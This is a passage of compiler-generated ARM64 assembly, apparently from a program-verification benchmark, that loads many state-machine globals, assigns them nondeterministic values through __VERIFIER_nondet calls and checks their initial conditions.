adrp x8, _sm5_state@GOTPAGE
ldr x8, [x8, _sm5_state@GOTPAGEOFF]
str x8, [sp, #672] ; 8-byte Folded Spill
adrp x8, _run@GOTPAGE
ldr x8, [x8, _run@GOTPAGEOFF]
str x8, [sp, #680] ; 8-byte Folded Spill
adrp x8, _sm2_l@GOTPAGE
ldr x8, [x8, _sm2_l@GOTPAGEOFF]
str x8, [sp, #688] ; 8-byte Folded Spill
adrp x8, _sm0_loop_len@GOTPAGE
ldr x8, [x8, _sm0_loop_len@GOTPAGEOFF]
str x8, [sp, #696] ; 8-byte Folded Spill
adrp x8, _sm0_l@GOTPAGE
ldr x8, [x8, _sm0_l@GOTPAGEOFF]
str x8, [sp, #704] ; 8-byte Folded Spill
adrp x8, _sm8_state@GOTPAGE
ldr x8, [x8, _sm8_state@GOTPAGEOFF]
str x8, [sp, #712] ; 8-byte Folded Spill
adrp x8, _sm1_loop_len@GOTPAGE
ldr x8, [x8, _sm1_loop_len@GOTPAGEOFF]
str x8, [sp, #720] ; 8-byte Folded Spill
adrp x8, _sm2_state@GOTPAGE
ldr x8, [x8, _sm2_state@GOTPAGEOFF]
str x8, [sp, #728] ; 8-byte Folded Spill
adrp x8, _sm3_l@GOTPAGE
ldr x8, [x8, _sm3_l@GOTPAGEOFF]
str x8, [sp, #736] ; 8-byte Folded Spill
adrp x8, _sm0_state@GOTPAGE
ldr x8, [x8, _sm0_state@GOTPAGEOFF]
str x8, [sp, #744] ; 8-byte Folded Spill
adrp x8, _sm1_state@GOTPAGE
ldr x8, [x8, _sm1_state@GOTPAGEOFF]
str x8, [sp, #752] ; 8-byte Folded Spill
adrp x8, _sm1_l@GOTPAGE
ldr x8, [x8, _sm1_l@GOTPAGEOFF]
str x8, [sp, #760] ; 8-byte Folded Spill
adrp x8, _sm5_l@GOTPAGE
ldr x8, [x8, _sm5_l@GOTPAGEOFF]
str x8, [sp, #768] ; 8-byte Folded Spill
adrp x8, _sm4_l@GOTPAGE
ldr x8, [x8, _sm4_l@GOTPAGEOFF]
str x8, [sp, #776] ; 8-byte Folded Spill
adrp x8, _sm2_loop_len@GOTPAGE
ldr x8, [x8, _sm2_loop_len@GOTPAGEOFF]
str x8, [sp, #784] ; 8-byte Folded Spill
adrp x8, _sm9_state@GOTPAGE
ldr x8, [x8, _sm9_state@GOTPAGEOFF]
str x8, [sp, #792] ; 8-byte Folded Spill
adrp x8, _sm9_l@GOTPAGE
ldr x8, [x8, _sm9_l@GOTPAGEOFF]
str x8, [sp, #800] ; 8-byte Folded Spill
adrp x8, _sm3_loop_len@GOTPAGE
ldr x8, [x8, _sm3_loop_len@GOTPAGEOFF]
str x8, [sp, #808] ; 8-byte Folded Spill
adrp x8, _sm10_state@GOTPAGE
ldr x8, [x8, _sm10_state@GOTPAGEOFF]
str x8, [sp, #816] ; 8-byte Folded Spill
adrp x8, _sm18_state@GOTPAGE
ldr x8, [x8, _sm18_state@GOTPAGEOFF]
str x8, [sp, #824] ; 8-byte Folded Spill
adrp x8, _sm11_loop_len@GOTPAGE
ldr x8, [x8, _sm11_loop_len@GOTPAGEOFF]
str x8, [sp, #832] ; 8-byte Folded Spill
adrp x8, _sm10_l@GOTPAGE
ldr x8, [x8, _sm10_l@GOTPAGEOFF]
str x8, [sp, #840] ; 8-byte Folded Spill
adrp x8, _sm4_loop_len@GOTPAGE
ldr x8, [x8, _sm4_loop_len@GOTPAGEOFF]
str x8, [sp, #848] ; 8-byte Folded Spill
adrp x8, _sm11_state@GOTPAGE
ldr x8, [x8, _sm11_state@GOTPAGEOFF]
str x8, [sp, #856] ; 8-byte Folded Spill
adrp x8, _sm19_state@GOTPAGE
ldr x8, [x8, _sm19_state@GOTPAGEOFF]
str x8, [sp, #864] ; 8-byte Folded Spill
adrp x8, _sm12_loop_len@GOTPAGE
ldr x8, [x8, _sm12_loop_len@GOTPAGEOFF]
str x8, [sp, #872] ; 8-byte Folded Spill
adrp x8, _sm11_l@GOTPAGE
ldr x8, [x8, _sm11_l@GOTPAGEOFF]
str x8, [sp, #880] ; 8-byte Folded Spill
adrp x8, _sm5_loop_len@GOTPAGE
ldr x8, [x8, _sm5_loop_len@GOTPAGEOFF]
str x8, [sp, #888] ; 8-byte Folded Spill
adrp x8, _sm12_state@GOTPAGE
ldr x8, [x8, _sm12_state@GOTPAGEOFF]
str x8, [sp, #896] ; 8-byte Folded Spill
adrp x8, _sm20_state@GOTPAGE
ldr x8, [x8, _sm20_state@GOTPAGEOFF]
str x8, [sp, #904] ; 8-byte Folded Spill
adrp x8, _sm13_loop_len@GOTPAGE
ldr x8, [x8, _sm13_loop_len@GOTPAGEOFF]
str x8, [sp, #912] ; 8-byte Folded Spill
adrp x8, _sm12_l@GOTPAGE
ldr x8, [x8, _sm12_l@GOTPAGEOFF]
str x8, [sp, #920] ; 8-byte Folded Spill
adrp x8, _sm6_loop_len@GOTPAGE
ldr x8, [x8, _sm6_loop_len@GOTPAGEOFF]
str x8, [sp, #928] ; 8-byte Folded Spill
adrp x8, _sm13_state@GOTPAGE
ldr x8, [x8, _sm13_state@GOTPAGEOFF]
str x8, [sp, #936] ; 8-byte Folded Spill
adrp x8, _sm21_state@GOTPAGE
ldr x8, [x8, _sm21_state@GOTPAGEOFF]
str x8, [sp, #944] ; 8-byte Folded Spill
adrp x8, _sm14_loop_len@GOTPAGE
ldr x8, [x8, _sm14_loop_len@GOTPAGEOFF]
str x8, [sp, #952] ; 8-byte Folded Spill
adrp x8, _sm13_l@GOTPAGE
ldr x8, [x8, _sm13_l@GOTPAGEOFF]
stur x8, [x29, #-256] ; 8-byte Folded Spill
adrp x8, _sm7_loop_len@GOTPAGE
ldr x8, [x8, _sm7_loop_len@GOTPAGEOFF]
stur x8, [x29, #-248] ; 8-byte Folded Spill
adrp x8, _sm14_state@GOTPAGE
ldr x8, [x8, _sm14_state@GOTPAGEOFF]
stur x8, [x29, #-240] ; 8-byte Folded Spill
adrp x8, _sm15_loop_len@GOTPAGE
ldr x8, [x8, _sm15_loop_len@GOTPAGEOFF]
stur x8, [x29, #-232] ; 8-byte Folded Spill
adrp x8, _sm14_l@GOTPAGE
ldr x8, [x8, _sm14_l@GOTPAGEOFF]
stur x8, [x29, #-224] ; 8-byte Folded Spill
adrp x8, _sm8_loop_len@GOTPAGE
ldr x8, [x8, _sm8_loop_len@GOTPAGEOFF]
stur x8, [x29, #-216] ; 8-byte Folded Spill
adrp x8, _sm15_state@GOTPAGE
ldr x8, [x8, _sm15_state@GOTPAGEOFF]
stur x8, [x29, #-208] ; 8-byte Folded Spill
adrp x8, _sm16_loop_len@GOTPAGE
ldr x8, [x8, _sm16_loop_len@GOTPAGEOFF]
stur x8, [x29, #-200] ; 8-byte Folded Spill
adrp x8, _sm15_l@GOTPAGE
ldr x8, [x8, _sm15_l@GOTPAGEOFF]
stur x8, [x29, #-192] ; 8-byte Folded Spill
adrp x8, _sm9_loop_len@GOTPAGE
ldr x8, [x8, _sm9_loop_len@GOTPAGEOFF]
stur x8, [x29, #-184] ; 8-byte Folded Spill
adrp x8, _sm16_state@GOTPAGE
ldr x8, [x8, _sm16_state@GOTPAGEOFF]
stur x8, [x29, #-176] ; 8-byte Folded Spill
adrp x8, _sm17_loop_len@GOTPAGE
ldr x8, [x8, _sm17_loop_len@GOTPAGEOFF]
stur x8, [x29, #-168] ; 8-byte Folded Spill
adrp x8, _semaphore@GOTPAGE
ldr x8, [x8, _semaphore@GOTPAGEOFF]
stur x8, [x29, #-112] ; 8-byte Folded Spill
adrp x8, _sm16_l@GOTPAGE
ldr x8, [x8, _sm16_l@GOTPAGEOFF]
stur x8, [x29, #-160] ; 8-byte Folded Spill
adrp x8, _sm10_loop_len@GOTPAGE
ldr x8, [x8, _sm10_loop_len@GOTPAGEOFF]
stur x8, [x29, #-152] ; 8-byte Folded Spill
adrp x8, _sm17_state@GOTPAGE
ldr x8, [x8, _sm17_state@GOTPAGEOFF]
stur x8, [x29, #-144] ; 8-byte Folded Spill
adrp x8, _sm18_loop_len@GOTPAGE
ldr x8, [x8, _sm18_loop_len@GOTPAGEOFF]
stur x8, [x29, #-136] ; 8-byte Folded Spill
adrp x8, _sm17_l@GOTPAGE
ldr x8, [x8, _sm17_l@GOTPAGEOFF]
stur x8, [x29, #-128] ; 8-byte Folded Spill
adrp x8, _sm18_l@GOTPAGE
ldr x8, [x8, _sm18_l@GOTPAGEOFF]
stur x8, [x29, #-120] ; 8-byte Folded Spill
adrp x8, __x_sm21_l@GOTPAGE
ldr x8, [x8, __x_sm21_l@GOTPAGEOFF]
str x8, [sp, #32] ; 8-byte Folded Spill
adrp x8, __x_sm21_loop_len@GOTPAGE
ldr x8, [x8, __x_sm21_loop_len@GOTPAGEOFF]
str x8, [sp, #40] ; 8-byte Folded Spill
adrp x8, __x_sm20_l@GOTPAGE
ldr x8, [x8, __x_sm20_l@GOTPAGEOFF]
str x8, [sp, #48] ; 8-byte Folded Spill
adrp x8, __x_sm20_loop_len@GOTPAGE
ldr x8, [x8, __x_sm20_loop_len@GOTPAGEOFF]
str x8, [sp, #56] ; 8-byte Folded Spill
adrp x8, __x_sm19_l@GOTPAGE
ldr x8, [x8, __x_sm19_l@GOTPAGEOFF]
str x8, [sp, #64] ; 8-byte Folded Spill
adrp x8, __x_sm19_loop_len@GOTPAGE
ldr x8, [x8, __x_sm19_loop_len@GOTPAGEOFF]
str x8, [sp, #72] ; 8-byte Folded Spill
adrp x8, __x_sm7_state@GOTPAGE
ldr x8, [x8, __x_sm7_state@GOTPAGEOFF]
str x8, [sp, #80] ; 8-byte Folded Spill
adrp x8, __x_sm6_state@GOTPAGE
ldr x8, [x8, __x_sm6_state@GOTPAGEOFF]
str x8, [sp, #88] ; 8-byte Folded Spill
adrp x8, __x_sm8_l@GOTPAGE
ldr x8, [x8, __x_sm8_l@GOTPAGEOFF]
str x8, [sp, #96] ; 8-byte Folded Spill
adrp x8, __x_sm4_state@GOTPAGE
ldr x8, [x8, __x_sm4_state@GOTPAGEOFF]
str x8, [sp, #104] ; 8-byte Folded Spill
adrp x8, __x_sm3_state@GOTPAGE
ldr x8, [x8, __x_sm3_state@GOTPAGEOFF]
str x8, [sp, #112] ; 8-byte Folded Spill
adrp x8, __x_sm6_l@GOTPAGE
ldr x8, [x8, __x_sm6_l@GOTPAGEOFF]
str x8, [sp, #120] ; 8-byte Folded Spill
adrp x8, __x_sm7_l@GOTPAGE
ldr x8, [x8, __x_sm7_l@GOTPAGEOFF]
str x8, [sp, #128] ; 8-byte Folded Spill
adrp x8, __x_sm5_state@GOTPAGE
ldr x8, [x8, __x_sm5_state@GOTPAGEOFF]
str x8, [sp, #136] ; 8-byte Folded Spill
adrp x8, __x_sm2_l@GOTPAGE
ldr x8, [x8, __x_sm2_l@GOTPAGEOFF]
str x8, [sp, #144] ; 8-byte Folded Spill
adrp x8, __x_sm0_loop_len@GOTPAGE
ldr x8, [x8, __x_sm0_loop_len@GOTPAGEOFF]
str x8, [sp, #152] ; 8-byte Folded Spill
adrp x8, __x_sm0_l@GOTPAGE
ldr x8, [x8, __x_sm0_l@GOTPAGEOFF]
str x8, [sp, #160] ; 8-byte Folded Spill
adrp x8, __x_sm8_state@GOTPAGE
ldr x8, [x8, __x_sm8_state@GOTPAGEOFF]
str x8, [sp, #168] ; 8-byte Folded Spill
adrp x8, __x_sm1_loop_len@GOTPAGE
ldr x8, [x8, __x_sm1_loop_len@GOTPAGEOFF]
str x8, [sp, #176] ; 8-byte Folded Spill
adrp x8, __x_sm2_state@GOTPAGE
ldr x8, [x8, __x_sm2_state@GOTPAGEOFF]
str x8, [sp, #184] ; 8-byte Folded Spill
adrp x8, __x_sm3_l@GOTPAGE
ldr x8, [x8, __x_sm3_l@GOTPAGEOFF]
str x8, [sp, #192] ; 8-byte Folded Spill
adrp x8, __x_sm0_state@GOTPAGE
ldr x8, [x8, __x_sm0_state@GOTPAGEOFF]
str x8, [sp, #200] ; 8-byte Folded Spill
adrp x8, __x_sm1_state@GOTPAGE
ldr x8, [x8, __x_sm1_state@GOTPAGEOFF]
str x8, [sp, #208] ; 8-byte Folded Spill
adrp x8, __x_sm1_l@GOTPAGE
ldr x8, [x8, __x_sm1_l@GOTPAGEOFF]
str x8, [sp, #216] ; 8-byte Folded Spill
adrp x8, __x_sm5_l@GOTPAGE
ldr x8, [x8, __x_sm5_l@GOTPAGEOFF]
str x8, [sp, #224] ; 8-byte Folded Spill
adrp x8, __x_sm4_l@GOTPAGE
ldr x8, [x8, __x_sm4_l@GOTPAGEOFF]
str x8, [sp, #232] ; 8-byte Folded Spill
adrp x8, __x_sm2_loop_len@GOTPAGE
ldr x8, [x8, __x_sm2_loop_len@GOTPAGEOFF]
str x8, [sp, #240] ; 8-byte Folded Spill
adrp x8, __x_sm9_state@GOTPAGE
ldr x8, [x8, __x_sm9_state@GOTPAGEOFF]
str x8, [sp, #248] ; 8-byte Folded Spill
adrp x8, __x_sm9_l@GOTPAGE
ldr x8, [x8, __x_sm9_l@GOTPAGEOFF]
str x8, [sp, #256] ; 8-byte Folded Spill
adrp x8, __x_sm3_loop_len@GOTPAGE
ldr x8, [x8, __x_sm3_loop_len@GOTPAGEOFF]
str x8, [sp, #264] ; 8-byte Folded Spill
adrp x8, __x_sm10_state@GOTPAGE
ldr x8, [x8, __x_sm10_state@GOTPAGEOFF]
str x8, [sp, #272] ; 8-byte Folded Spill
adrp x8, __x_sm18_state@GOTPAGE
ldr x8, [x8, __x_sm18_state@GOTPAGEOFF]
str x8, [sp, #280] ; 8-byte Folded Spill
adrp x8, __x_sm11_loop_len@GOTPAGE
ldr x8, [x8, __x_sm11_loop_len@GOTPAGEOFF]
str x8, [sp, #288] ; 8-byte Folded Spill
adrp x8, __x_sm10_l@GOTPAGE
ldr x8, [x8, __x_sm10_l@GOTPAGEOFF]
str x8, [sp, #296] ; 8-byte Folded Spill
adrp x8, __x_sm4_loop_len@GOTPAGE
ldr x8, [x8, __x_sm4_loop_len@GOTPAGEOFF]
str x8, [sp, #304] ; 8-byte Folded Spill
adrp x8, __x_sm11_state@GOTPAGE
ldr x8, [x8, __x_sm11_state@GOTPAGEOFF]
str x8, [sp, #312] ; 8-byte Folded Spill
adrp x8, __x_sm19_state@GOTPAGE
ldr x8, [x8, __x_sm19_state@GOTPAGEOFF]
str x8, [sp, #320] ; 8-byte Folded Spill
adrp x8, __x_sm12_loop_len@GOTPAGE
ldr x8, [x8, __x_sm12_loop_len@GOTPAGEOFF]
str x8, [sp, #328] ; 8-byte Folded Spill
adrp x8, __x_sm11_l@GOTPAGE
ldr x8, [x8, __x_sm11_l@GOTPAGEOFF]
str x8, [sp, #336] ; 8-byte Folded Spill
adrp x8, __x_sm5_loop_len@GOTPAGE
ldr x8, [x8, __x_sm5_loop_len@GOTPAGEOFF]
str x8, [sp, #344] ; 8-byte Folded Spill
adrp x8, __x_sm12_state@GOTPAGE
ldr x8, [x8, __x_sm12_state@GOTPAGEOFF]
str x8, [sp, #352] ; 8-byte Folded Spill
adrp x8, __x_sm20_state@GOTPAGE
ldr x8, [x8, __x_sm20_state@GOTPAGEOFF]
str x8, [sp, #360] ; 8-byte Folded Spill
adrp x8, __x_sm13_loop_len@GOTPAGE
ldr x8, [x8, __x_sm13_loop_len@GOTPAGEOFF]
str x8, [sp, #368] ; 8-byte Folded Spill
adrp x8, __x_sm12_l@GOTPAGE
ldr x8, [x8, __x_sm12_l@GOTPAGEOFF]
str x8, [sp, #376] ; 8-byte Folded Spill
adrp x8, __x_sm6_loop_len@GOTPAGE
ldr x8, [x8, __x_sm6_loop_len@GOTPAGEOFF]
str x8, [sp, #384] ; 8-byte Folded Spill
adrp x8, __x_sm13_state@GOTPAGE
ldr x8, [x8, __x_sm13_state@GOTPAGEOFF]
str x8, [sp, #392] ; 8-byte Folded Spill
adrp x8, __x_sm21_state@GOTPAGE
ldr x8, [x8, __x_sm21_state@GOTPAGEOFF]
str x8, [sp, #400] ; 8-byte Folded Spill
adrp x8, __x_sm14_loop_len@GOTPAGE
ldr x8, [x8, __x_sm14_loop_len@GOTPAGEOFF]
str x8, [sp, #408] ; 8-byte Folded Spill
adrp x8, __x_sm13_l@GOTPAGE
ldr x8, [x8, __x_sm13_l@GOTPAGEOFF]
str x8, [sp, #416] ; 8-byte Folded Spill
adrp x8, __x_sm7_loop_len@GOTPAGE
ldr x8, [x8, __x_sm7_loop_len@GOTPAGEOFF]
str x8, [sp, #424] ; 8-byte Folded Spill
adrp x8, __x_sm14_state@GOTPAGE
ldr x8, [x8, __x_sm14_state@GOTPAGEOFF]
str x8, [sp, #432] ; 8-byte Folded Spill
adrp x8, __x_sm15_loop_len@GOTPAGE
ldr x8, [x8, __x_sm15_loop_len@GOTPAGEOFF]
str x8, [sp, #440] ; 8-byte Folded Spill
adrp x8, __x_sm14_l@GOTPAGE
ldr x8, [x8, __x_sm14_l@GOTPAGEOFF]
str x8, [sp, #448] ; 8-byte Folded Spill
adrp x8, __x_sm8_loop_len@GOTPAGE
ldr x8, [x8, __x_sm8_loop_len@GOTPAGEOFF]
str x8, [sp, #456] ; 8-byte Folded Spill
adrp x8, __x_sm15_state@GOTPAGE
ldr x8, [x8, __x_sm15_state@GOTPAGEOFF]
str x8, [sp, #464] ; 8-byte Folded Spill
adrp x8, __x_sm16_loop_len@GOTPAGE
ldr x8, [x8, __x_sm16_loop_len@GOTPAGEOFF]
str x8, [sp, #472] ; 8-byte Folded Spill
adrp x8, __x_sm15_l@GOTPAGE
ldr x8, [x8, __x_sm15_l@GOTPAGEOFF]
str x8, [sp, #480] ; 8-byte Folded Spill
adrp x8, __x_sm9_loop_len@GOTPAGE
ldr x8, [x8, __x_sm9_loop_len@GOTPAGEOFF]
str x8, [sp, #488] ; 8-byte Folded Spill
adrp x8, __x_sm16_state@GOTPAGE
ldr x8, [x8, __x_sm16_state@GOTPAGEOFF]
str x8, [sp, #496] ; 8-byte Folded Spill
adrp x8, __x_sm17_loop_len@GOTPAGE
ldr x8, [x8, __x_sm17_loop_len@GOTPAGEOFF]
str x8, [sp, #504] ; 8-byte Folded Spill
adrp x8, __x_semaphore@GOTPAGE
ldr x8, [x8, __x_semaphore@GOTPAGEOFF]
str x8, [sp, #512] ; 8-byte Folded Spill
adrp x8, __x_sm16_l@GOTPAGE
ldr x8, [x8, __x_sm16_l@GOTPAGEOFF]
str x8, [sp, #520] ; 8-byte Folded Spill
adrp x8, __x_sm10_loop_len@GOTPAGE
ldr x8, [x8, __x_sm10_loop_len@GOTPAGEOFF]
str x8, [sp, #528] ; 8-byte Folded Spill
adrp x8, __x_sm17_state@GOTPAGE
ldr x8, [x8, __x_sm17_state@GOTPAGEOFF]
str x8, [sp, #536] ; 8-byte Folded Spill
adrp x8, __x_sm18_loop_len@GOTPAGE
ldr x8, [x8, __x_sm18_loop_len@GOTPAGEOFF]
str x8, [sp, #544] ; 8-byte Folded Spill
adrp x8, __x_sm17_l@GOTPAGE
ldr x8, [x8, __x_sm17_l@GOTPAGEOFF]
str x8, [sp, #552] ; 8-byte Folded Spill
adrp x8, __x_sm18_l@GOTPAGE
ldr x8, [x8, __x_sm18_l@GOTPAGEOFF]
str x8, [sp, #560] ; 8-byte Folded Spill
stur wzr, [x29, #-92]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #568] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #576] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #584] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #592] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #600] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #608] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #616] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #624] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #632] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #640] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #648] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #656] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #664] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #672] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #680] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #688] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #696] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #704] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #712] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #720] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #728] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #736] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #744] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #752] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #760] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #768] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #776] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #784] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #792] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #800] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #808] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #816] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #824] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #832] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #840] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #848] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #856] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #864] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #872] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #880] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #888] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #896] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #904] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #912] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #920] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #928] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #936] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #944] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #952] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-256] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-248] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldur x8, [x29, #-240] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-232] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-224] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-216] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldur x8, [x29, #-208] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-200] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-192] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-184] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldur x8, [x29, #-176] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-168] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-112] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-160] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-152] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldur x8, [x29, #-144] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-136] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x8, [x29, #-128] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldur x9, [x29, #-120] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
str w0, [x9]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_1
LBB1_1:
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_2
LBB1_2:
ldr x8, [sp, #696] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_3
LBB1_3:
ldr x8, [sp, #704] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_4
LBB1_4:
ldr x8, [sp, #752] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_5
LBB1_5:
ldr x8, [sp, #720] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_6
LBB1_6:
ldr x8, [sp, #760] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_7
LBB1_7:
ldr x8, [sp, #728] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_8
LBB1_8:
ldr x8, [sp, #784] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_9
LBB1_9:
ldr x8, [sp, #688] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_10
LBB1_10:
ldr x8, [sp, #648] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_11
LBB1_11:
ldr x8, [sp, #808] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_12
LBB1_12:
ldr x8, [sp, #736] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_13
